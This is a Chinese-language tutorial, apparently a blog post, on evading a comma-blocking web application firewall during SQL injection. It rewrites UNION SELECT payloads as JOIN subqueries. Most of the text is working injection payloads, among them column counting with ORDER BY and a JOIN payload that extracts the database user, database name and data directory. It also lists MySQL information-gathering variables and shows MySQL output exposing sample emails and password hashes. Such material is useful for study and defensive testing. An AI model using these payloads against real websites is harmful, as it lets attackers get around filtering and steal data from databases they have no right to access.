在SQL注入時,在確定了注入點后,一般都需要使用聯合查詢猜表的列數,也就是常見的order by n,n從大到小,直到返回正常,就確定了當前查詢的列的個數。
然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,這是一個常規流程,語句中包含了多個逗號。
但是如果有WAF攔截了逗號時,我們的聯合查詢就被攔截了。
如果想繞過,就需要使用 Join 方法繞過。join的介紹看我的另一篇文章。
其實就簡單的幾句,在顯示位上替換為常見的注入變量或其它語句:
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
常用數據庫變量:
User() 查看用戶
database() --查看數據庫名稱
Version() --查看數據庫版本
@@datadir --數據庫路徑
@@version_compile_os--操作系統版本
system_user() --系統用戶名
current_user()--當前用戶名
session_user()--連接數據庫的用戶名
舉例:
1. 假設我有一個表user,有5個列(字段),2行記錄:
mysql> show tables; +--------------------------+ | Tables_in_gogs | +--------------------------+ | user | | version | +--------------------------+ 2 rows in set (0.00 sec) mysql> desc user; +----------------------+---------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------------------+---------------+------+-----+---------+----------------+ | id | bigint(20) | NO | PRI | NULL | auto_increment | | name | varchar(255) | NO | UNI | NULL | | | email | varchar(255) | NO | | NULL | | | passwd | varchar(255) | NO | | NULL | | | salt | varchar(10) | NO | | NULL | | +----------------------+---------------+------+-----+---------+----------------+ 5 rows in set (0.01 sec) mysql> select id,name,email,passwd from user; +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name | email | passwd | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | | 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 2 rows in set (0.00 sec)
2. UNION開頭的是我們在URL中注入的語句,這里只是演示,在實際中如果我們在注入語句中有逗號就可能被攔截。
mysql> select id,name,email,passwd from user union select 1,2,3,4;
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
3. 不出現逗號,使用Join來繼續注入
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
4. 繞過之后就可以替換顯示的數字位繼續注入獲取數據庫及系統信息
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D); +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name | email | passwd | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | | 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | | 1 | 2 | 3 | root@localhost gogs /var/lib/mysql/ | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 3 rows in set (0.00 sec)